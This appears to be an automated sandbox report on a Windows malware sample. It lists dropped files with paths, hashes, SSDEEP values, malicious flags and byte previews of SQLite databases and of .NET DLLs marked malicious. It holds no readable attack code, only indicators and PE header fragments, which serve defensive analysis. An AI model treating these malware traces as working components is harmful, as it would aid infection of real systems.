                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.5707520969659783
                                                    Encrypted:false
                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):2.5793180405395284
                                                    Encrypted:false
                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):49152
                                                    Entropy (8bit):0.8180424350137764
                                                    Encrypted:false
                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                    Category:dropped
                                                    Size (bytes):40960
                                                    Entropy (8bit):0.8553638852307782
                                                    Encrypted:false
                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):103
                                                    Entropy (8bit):3.9770111444684244
                                                    Encrypted:false
                                                    SSDEEP:3:XSWHlkHFWKBmGBnLHfYhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0amGBzwLkWFfx/52uyPm
                                                    MD5:487AB53955A5EA101720115F32237A45
                                                    SHA1:C59D22F8BC8005694505ADDEF88F7968C8D393D3
                                                    SHA-256:D64354A111FD859A08552F6738FECD8C5594475E8C03BB37546812A205D0D368
                                                    SHA-512:468689D98645C9F32813D833A07BBCF96FE0DE4593F4F4DC6757501FBCE8E9951D21A8AA4A7050A87A904D203F521134328D426D4E6AB9F20E7E759769003B7C
                                                    Malicious:false
                                                    Preview:{. "args" : {. "code" : "xRCaC7cdBn". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:ASCII text, with very long lines (335), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):335
                                                    Entropy (8bit):5.856285264489716
                                                    Encrypted:false
                                                    SSDEEP:6:iDnL4ReDBiNpTEpSM6PXIYVr+Wgi9TmrrZ9on7BEcJCOb221lJlRRL:NNap/eJVJgi9kr0nMOb2gjRRL
                                                    MD5:82C088ECE6D90EAE7F194B5A494F0788
                                                    SHA1:795AF67451D64C581EAC40007022132F78B4B661
                                                    SHA-256:30D169337FCA58A2C420463EEE1A0E13115A85EBE3AF07B0C18E8A86DFD01346
                                                    SHA-512:63044C7F2440D182D5D9625E8AFA7669D08801C2DFFEF8C6EEC65A58A2F64E259317E0060F5597E429EEC941443CB83C8C95FB5FE86A3A60681C1B05322AEBC5
                                                    Malicious:false
                                                    Preview:w4yWBDHaKuSeB7WVHntfNYzUHKdiFDruJm56jehoy80maNTqo90qfbGXEdO1kiVGDiUZCawmFErPiN340x3FMAPsfh1GPqEPntj224nONOlau1z1jUAxoP4CTm3fipWYAblyoBC6Kp28Yy7orAg5pRkXzgjPAHqh1NZSPBMiSEm9X5neoPxhJbst1O8Hcw6C8UHLZpYqx8nlolA42EkuUIYZeqbBCEFfIkADxcF91GtKyHFPNDOXMLr06rqtOWns2IdDk7Ga9l2NYNlXkLx80rS62KHFvWvfcARqnBpQ7yYlTebsGTICio2KzgKa0ApnzXuX55tiggBBTrn
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1920000
                                                    Entropy (8bit):7.535182328864218
                                                    Encrypted:false
                                                    SSDEEP:24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
                                                    MD5:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    SHA1:D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
                                                    SHA-256:DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
